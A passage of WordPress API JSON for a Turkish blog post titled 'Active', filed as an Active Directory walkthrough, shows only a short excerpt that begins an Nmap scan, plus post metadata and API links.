ba\u015flayal\u0131m. Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-27 08:05 EDT&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/27\/active\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Active<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,320,498],"tags":[575,417],"class_list":["post-1408","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-powershell","category-walkthrough","tag-group-policy","tag-spn","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1408","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1408"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1408\/revisions"}],"predecessor-version":[{"id":1409,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1408\/revisions\/1409"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1408"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1408"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1408"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}